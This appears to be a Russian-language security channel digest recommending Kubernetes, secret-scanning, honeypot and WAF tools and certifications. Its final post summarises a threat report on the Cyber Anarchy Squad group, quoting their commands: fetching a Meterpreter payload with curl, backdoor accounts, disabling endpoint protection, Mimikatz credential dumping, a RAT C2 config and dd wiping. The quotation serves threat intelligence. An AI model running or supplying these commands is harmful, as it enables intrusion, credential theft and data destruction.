Немного тулзов, чтобы у твоего кубернетеса не было дыры в безопасности

- rbac-manager - оператор для удобной работы с RBAC. Позволяет биндить роли по лейблам на ресурсах, создавать биндинги в разных неймспейсах из одного манифеста и по-другому упрощает жизнь кластер админа

- rbac-lookup - CLI утилита для просмотра прав юзеров. Одной строкой выводит все биндинги

- audit2rbac - читает аудит логи к8с и генерирует RBAC исходя из того, что нужно юзерам

#k8s #security #rbac

TruffleHog - поиск credentials в
- git
- github
- gitlab
- docker
- S3
- filesystem (files and directories)
- syslog
- circleci
- GCS (Google Cloud Storage)

#security #credentials

В дополнение к предыдущему посту

Наверняка, все уже почитали о MiTM'e jabber.ru, когда облачные хостеры воткнули полицейскую железку между серверами клиентов и провайдером интернета и сгенерировали новый сертификат для жертвы, чтобы спокойно потом расшифровывать трафик. В этот пост хочу вынести выводы из оригинального поста Валдика и ссылок из него. Пусть методы борьбы с такого рода MiTM'ом будут тут в сжатом виде - так подписчикам и мне самому будет проще вернуться к материалу и вспомнить детали. А кто ещё не читал оригинальный пост - вперед к чтению - там очень интересное расследование!

- DNS CAA из предыдущего поста
- Мониторить выдачу сертификатов на ваш домен. Работает не всегда
- Периодически коннектиться к сервису и проверять и проверять публичный ключ
- Ограничить способы выдачи сертификатов и аккаунты, которым это позволено
- Мониторить сторонними сервисами изменения сертификатов
- Контролировать смену MAC адреса шлюза

Вообще, советую побродить по бложику - там много интересного, например о том, что Cloudflare зло и надежного E2E шифрования не существует

#mitm #security #TLS #certificates

Цикл лекций от ВШЭ и kaspersky Lab Основы анализа вредоносных объектов

#security #лекции #посмотреть

Получил CKS, а тяга к курсам и сертификатам все ещё не утихает. Что же делать?
Собрал ещё пачку сертификатов по безопасности кубернетеса и облаков.

- Certified Cloud Native Security Expert от какой-то неизвестной мне конторы. В описании курса перечислены темы из CKS, отдельные модули о Microservices Architecture и Container Security и такие инструменты: kube-hunter, KubiScan, krane, inspec, wazuh. Выглядит интересно, но бесполезно после CKS и непонятно кто вообще признает серты этой компании. Если вы что-то знаете об этой компании - напишите в комментах, пожалуйста


По облачной безопасности сертов больше:
- Вендорские от AWS, GCP, Azure

- CompTIA Cloud+ - уважаемая контора и сертфикация. Вендор фри. Темы:
- 1 Cloud Architecture and Design
- 1.1 Compare and contrast the different types of cloud models
- 1.2 Capacity planning
- 1.3 High availability and scaling in cloud environments
- 1.4 Solution design in support of the business requirements
- 2 Security
- 2.1 Identity and access management (LDAP, SSO, SAML, PKI, MFA)
- 2.2 Secure a network in a cloud environment (VLAN, VXLAN, GENEVE, DoH, DoT, DNSSEC, NTP, IPSEC, TLS, VPNs, WAF, IPS, IDS, IPC, DLP)
- 2.3 OS and application security controls
- 2.4 Data security and compliance controls in cloud environments
- 2.5 Tools to meet security requirements
- 2.6 Incident response
- 3 Deployment
- 3.1 Integrate components into a cloud solution (email, VoIP, messaging, VDI)
- 3.2 Storage in cloud environments (SAN, NAS, network filesystems)
- 3.3 Cloud networking solutions
- 3.4 Appropriate compute sizing
- 3.5 Cloud migrations (Physical to virtual (P2V), Virtual to virtual (V2V), Storage migration, Database migration)
- 4 Operations and Support
- 4.1 Logging, monitoring, and alerting
- 4.2 Efficient operation
- 4.3 Optimize cloud environments
- 4.4 Automation and orchestration techniques
- 4.5 Backup and restore operations
- 4.6 Disaster recovery
- 5 Troubleshooting
- 5.1 Troubleshooting methodology to resolve cloud-related issues
- 5.2 Troubleshoot security issues
- 5.3 Troubleshoot deployment issues
- 5.4 Troubleshoot connectivity issues
- 5.5 Troubleshoot common performance issues
- 5.6 Troubleshoot automation or orchestration issues
Полное описание экзамена
У CompTIA ещё много сертификаций на сайте. Насколько я понял, курсы они не читают, а только принимают экзамены. Курсы доступны на других платформах

- GIAC Cloud Security Automation. GIAC - отделение небезызвестной SANS. Очень уважаемая компания. Сертификатов у них много по разным направлениям, как и у CompTIA. Топики:
- Microservice Security
- Cloud Security Fundamentals
- Cloud Security Monitoring
- Compliance as Code
- Configuration Management as Code
- Container Security
- Continuous Security Monitoring
- Data Protection and Secrets Management
- Deployment Orchestration and Secure Content Delivery
- DevOps Fundamentals
- DevSecOps Security Controls
- Runtime Security Automation
- Secure Infrastructure as Code
- Securing Cloud Architecture
- Serverless Security

- Certified Cloud Security Professional от ISC2. Топики похожи на перечисленные выше от конкурентов. Детальней тут

#courses #security #cloud

Above - Network protocol sniffer, allows you to find network attack vectors

Абсолютно бесшумный снифер. Позволяет остаться незамеченным при исследовании сетевых протоколов

#network #security

Обнаружить нарушителя в инфраструктуре не так то просто. Большие компании нанимают целые отделы для анализа логов и поведения софта, чтобы вовремя найти злоумышленника и предовратить развитие атаки.

Если такого отдела нет (да и если есть), то можно поставить специально подготовленную уязвимую систему, не участвующую в бизнес процессах, а лишь притягивающую на себя внимание атакующего. И внимательно наблюдать за ней. Когда кто-то скачает файл или попытается залогиниться - это звоночек, указывающий, что кто-то пытается зайти туда, куда не должен и нужно усилить охрану. Такие системы называются Honey Pot и могут эмулировать самые разные продакшн системы: VPN серверы, веб серверы, mail серверы, ssh серверы, elasticsearch, jira, smb шары, ...

T-Pot - целый комбайн из Honey Pots, работающий в OnPrem или облаках. Он оркестрирует работу пачки разных Honey Pots и выдает результаты работы в удобном интерфейсе


Ну а если не хочется заморачиваться с установкой и настройкой, то можно попробовать canarytokens. Я уже писал об этом сервисе

#security #honeypot

ContainerCVE - онлайн платформа для поиска уязвимостей в публичных образах на hub.docker.com. Использует под капотом trivy

#security #docker

Как собрать контейнер и не вооружить хакера

Хакеру необязательно ставить внутрь системы или контейнера какой-то дополнительный софт. Часто для плохих дел достаточно всеми любимых утилит типа curl, vim, pip

В статье о том, как можно использовать эти с виду безопасные утилиты в деструктивных целях и как от этого защититься

#security #docker #lolbins

Кроссворд про #security и много других игр (неинтересных) по кнопке Play Other Games

https://securityawareness.usalearning.gov/cdse/multimedia/games/cybersecurity-crossword/index.html

https://github.com/bunkerity/bunkerweb

Продолжение рубрики "гитхаб от дядюшки Слэша"

#WAF #security

Пошаговый процесс создания и запуска фишинговой кампании с целью тестирования и улучшения безопасности организации.

https://blog.onsec.io/from-zero-to-hero-phishing-campaign/
https://blog.onsec.io/from-zero-to-hero-phishing-campaign-part-2/
https://blog.onsec.io/from-zero-to-hero-phishing-company-final/

#phishing #security

Сегодня обнаружил, что у Grafana есть фича поиска своих токенов в GitHub.

Когда GitHub Secret Scanning находит Grafana secret, его хэш отправляется в Grafana Labs’ secret scanning service.

Ваша Grafana может сравнивать этот хэш с хэшем своих токенов и присылать алерты что токен утек.

GitHub молодцы, Grafana молодцы, все молодцы! Осталось только включить [secretscan]

#grafana #security

Sara: RouterOS Security Inspector

Python скрипт для проверки безопасности конфигурации RouterOS

#routeros #mikrotik #security #analyzer

DevSec Hardening Framework
Фреймворк и набор плейбуков для усиления безопасности ОС и сервисов

#security

«Тени не скроются: Расследование атак группировки Shadow»

F.A.C.C.T. выкатили объемный отчет о группировке Shadow, а также жирный комплект инструментария, используемого в атаках.

#security #report

Шаблоны для построения security пайплайнов. Можно взять какие-то идеи при построении DevSecOps пайплайна

Ещё один

#security

Azure Active Directory security operations guide

#security #microsoft #azure #AD

Falcosidekick - коннектор Falco (eBPF аудит сисколов) ко всему на свете - позволит отправлять уведомленния о событиях в мессенджеры, БД, Jira, да куда угодно

И falcosidekick-ui - UI к нему

#falco #security

Сквозь тени анархии: разбираем атаки Cyber Anarchy Squad

Отчет о деятельности хак-группы. Интересно узнать какими инструментами пользуются атакующие:
1. Initial Access (Первоначальный доступ):
-Компрометация сервисов: Используются уязвимости в Jira, Confluence, MS SQL Server.

2. Execution (Выполнение):
- Запуск команд через MS SQL: cmd.exe /c
-Процесс cmd.exe запускается как дочерний процесс sqlservr.exe
- Запуск PowerShell-скриптов:

powershell.exe -ex bypass -f \\[DOMAIN]\netlogon\rm.ps1

-Загрузка обратной оболочки Meterpreter через c URL:

cmd.exe" /c cd %appdata% && dir && curl -O [URL]/sdc.exe

-Запуск Revenge RAT через PowerShell:

powershell.exe -WindowStyle Hidden -NoExit -Command 
[System.Reflection.Assembly]::LoadFile('C:\Users\<username>\Downloads\<exe_name>.exe').EntryPoint.Invoke($null, @())

3. Persistence (Закрепление):
-Создание учетных записей:

net user admin cas /add
net user admin admin123123123 /add

-Автозапуск через реестр:

RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
 registryKey.SetValue("rpchost", "\"C:\\Windows\\System32\\rpchost.exe\"");

-Создание службы для RAT:

Program.hService = Helper.CreateService(Program.hSCM, "NgcMngrSvc", "Microsoft Passport Manager", 983551, 16, 2, 0, Program.system + "svxhost.exe", null, IntPtr.Zero, null, null, null);

4. Defense Evasion (Уклонение от обнаружения):
- Отключение EPP через PowerShell:

 $guidQuery = wmic product where "[redacted]" get IdentifyingNumber
 $guid = $guidQuery | Select-String -Pattern "{[A-F0-9-]+}" | ForEach-Object { $_.Matches[0].Value }
 msiexec.exe /x $guid /quiet

-Добавление исключений Windows Defender:

powershell Add-MpPreference -ExclusionPath '$windir\$system32'

- Имитация системных процессов:

С:\Windows\System32\svxhost.exe
C:\Windows\System32\drivers\etc\rpchost.exe

5. Credential Access (Доступ к учетным данным):
-Сбор паролей с использованием Mimikatz(пример извлечения хэшей): sekurlsa::logonpasswords


6. Discovery (Исследование инфраструктуры):
- Сбор информации о пользователях и системе:

 net user
 systeminfo
 net localgroup
 cd %appdata% && whoami

WMI-запросы:

 SELECT * FROM Win32_OperatingSystem
 SELECT UserName FROM Win32_ComputerSystem
 SELECT * FROM WIN32_Processor

7. Command and Control (Управление):
-Конфигурация Spark RAT:
{
"secure": false,
"host": "[C2_SERVER]",
"port": 9610,
"path": "/",
"uuid": "3917b41****",
"key": "aa494c90****"
}


8. Impact (Нанесение ущерба):
- Шифрование файлов:
Используются LockBit и Babuk с расширениями, связанными с группой, например 3119.
-Удаление данных через dd:

 dd if=/dev/zero of=/dev/[VOLUME] bs=4M

Выжимку по командам стащил из Linkedin

#security #report